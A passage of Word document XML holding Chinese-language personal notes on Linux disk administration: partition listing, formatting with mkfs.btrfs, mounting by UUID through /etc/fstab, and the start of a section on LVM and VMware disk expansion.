        <w:t xml:space="preserve">  Device Boot   Start     End   Blocks  Id System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05715157" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/dev/sda1  *     63   208844   104391  83 Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A35C5" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>/dev/sda2     208845  20964824  10377990  8e Linux LVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDA521" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B49F4F" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Disk /dev/sdb: 5368 MB, 5368709120 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795055A4" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>255 heads, 63 sectors/track, 652 cylinders, total 10485760 sectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F25A69" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Units = sectors of 1 * 512 = 512 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01831BEE" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284107CE" w14:textId="1DD32C44" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Disk /dev/sdb doesn't contain a valid partition table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46453785" w14:textId="77777777" w:rsidR="00734456" w:rsidRDefault="00734456" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71731949" w14:textId="3A8A2F44" w:rsidR="005F17C0" w:rsidRDefault="00ED6864" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="256" w:name="_Toc159779716"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式化分区</w:t>
      </w:r>
      <w:r w:rsidR="005F17C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，制作文件系统</w:t>
      </w:r>
      <w:bookmarkEnd w:id="256"/>
    </w:p>
    <w:p w14:paraId="673D110D" w14:textId="77777777" w:rsidR="005F17C0" w:rsidRDefault="005F17C0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D0AE97" w14:textId="2E0E5F40" w:rsidR="00446BEA" w:rsidRDefault="00446BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsblk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fdisk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, blkid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以找到分区名字，随后格式化系统：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760D5230" w14:textId="7764FFC5" w:rsidR="005F17C0" w:rsidRPr="005F17C0" w:rsidRDefault="00446BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00446BEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00446BEA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>kfs.btrfs /dev/nvme0p1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD329D" w14:textId="77777777" w:rsidR="00ED6864" w:rsidRDefault="00ED6864" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165EDD0D" w14:textId="6DE96558" w:rsidR="00ED6864" w:rsidRDefault="00ED6864" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Toc159779717"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>持久化挂载磁盘</w:t>
      </w:r>
      <w:bookmarkEnd w:id="257"/>
    </w:p>
    <w:p w14:paraId="1B1C2D44" w14:textId="77777777" w:rsidR="00ED6864" w:rsidRDefault="00ED6864" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58832FF5" w14:textId="49098B39" w:rsidR="00464104" w:rsidRDefault="00446BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blkid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到不同分区的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uuid</w:t>
      </w:r>
      <w:r w:rsidR="00C52327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，虽然直接访问</w:t>
      </w:r>
      <w:r w:rsidR="00C52327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C52327">
        <w:t xml:space="preserve">dev/nvmexxxxp1 </w:t>
      </w:r>
      <w:r w:rsidR="00C52327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以根据这个路径挂载磁盘，但是</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>推荐根据</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uuid</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载，如你</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blkid</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uuid</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后</w:t>
      </w:r>
      <w:r w:rsidR="00464104" w:rsidRPr="00464104">
        <w:t>/dev/disk/by-uuid/</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:t xml:space="preserve">UUID&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00464104">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来找磁盘路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B89C9E" w14:textId="77777777" w:rsidR="003B5C16" w:rsidRDefault="003B5C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A8AFA4" w14:textId="21B65483" w:rsidR="003B5C16" w:rsidRDefault="003B5C16" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑命令挂载如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6401135F" w14:textId="77777777" w:rsidR="00446BEA" w:rsidRDefault="00446BEA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A61664C" w14:textId="77777777" w:rsidR="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cat /etc/fstab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059E5F15" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># /etc/fstab: static file system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B26AA4" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1F065" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># Use 'blkid' to print the universally unique identifier for a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F600BDC" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># device; this may be used with UUID= as a more robust way to name devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3E778" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># that works even if disks are added and removed. See fstab(5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3AA67" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D1A04" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># &lt;file system&gt; &lt;mount point&gt;   &lt;type&gt;  &lt;options&gt;       &lt;dump&gt;  &lt;pass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478BFB2C" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># / was on /dev/nvme0n1p2 during curtin installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602F9A3A" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/dev/disk/by-uuid/5205ac42-7b0d-4e89-baf6-efbaa10eb6a1 / btrfs defaults 0 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3C9BB5" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/dev/disk/by-uuid/e7fbe1e7-f47a-4dab-92b3-b455216c20ce none swap sw 0 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392E332A" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># /boot/efi was on /dev/nvme0n1p1 during curtin installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6DA5E1" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/dev/disk/by-uuid/4C64-BF4A /boot/efi vfat defaults 0 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5581777D" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D1CC93" w14:textId="77777777" w:rsidR="002210C8" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t># sanxing 1TB ssd mount by shenyanjian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F556D" w14:textId="25A21F43" w:rsidR="00446BEA" w:rsidRPr="002210C8" w:rsidRDefault="002210C8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002210C8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/dev/disk/by-uuid/d15d3cb5-ab82-477a-a557-125e094a6d13 /ssd btrfs defaults 0 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06186B66" w14:textId="77777777" w:rsidR="00ED6864" w:rsidRDefault="00ED6864" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9331A9" w14:textId="77777777" w:rsidR="00ED63E5" w:rsidRDefault="00ED63E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后你手动卸载下磁盘：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF4F03" w14:textId="0F099B30" w:rsidR="00ED6864" w:rsidRDefault="00ED63E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>umount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED63E5">
        <w:t>/dev/disk/by-uuid/d15d3cb5-a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4611A8E1" w14:textId="77777777" w:rsidR="00ED63E5" w:rsidRDefault="00ED63E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BCE798A" w14:textId="7EF89620" w:rsidR="00ED63E5" w:rsidRDefault="00ED63E5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mount</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，重新挂载下磁盘，进你默认设置的挂载目录，使用</w:t>
      </w:r>
      <w:r>
        <w:t>df -h ./&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂载目录</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidR="008C1D5D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看是否成功挂载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C5C8A1" w14:textId="77777777" w:rsidR="004C7753" w:rsidRDefault="004C7753" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0926E074" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_Toc159779718"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
    </w:p>
    <w:p w14:paraId="337D6967" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:t>https://blog.csdn.net/weixin_42915431/article/details/121881054</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D417526" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60EAFDA1" w14:textId="6655CDD5" w:rsidR="00A20C1C" w:rsidRDefault="00A20C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>mware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩容虚拟机磁盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D3A2D" w14:textId="77777777" w:rsidR="00A20C1C" w:rsidRDefault="00A20C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A943A70" w14:textId="77777777" w:rsidR="00A20C1C" w:rsidRDefault="00A20C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58DA8DA0" w14:textId="4914801E" w:rsidR="00A20C1C" w:rsidRDefault="00A20C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vmware</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机，在没有快照的情况下，可以直接对磁盘进行扩展。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3518C5" w14:textId="77777777" w:rsidR="00A20C1C" w:rsidRPr="00A20C1C" w:rsidRDefault="00A20C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29090A9E" w14:textId="373ECB43" w:rsidR="00CE3C9B" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟机可以扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果是扩展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘，则需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘的同磁盘内，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旁边没有同磁盘的其他分区，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盘才可以扩展，否则不行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5F032F" w14:textId="77777777" w:rsidR="00CE3C9B" w:rsidRDefault="00CE3C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05806F04" w14:textId="0AA05674" w:rsidR="00CE3C9B" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处说一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubtuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的扩展，扩展后直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">disk /dev/sda  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，对多余的磁盘盘符分区。但是我的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行磁盘管理，因此此处再次记录下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lvm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C07D7CA" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438A61E8" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F1504E" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的基本组成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2899D" w14:textId="77777777" w:rsidR="00C01274" w:rsidRDefault="00C01274" w:rsidP="009222EB">
      <w:pPr>
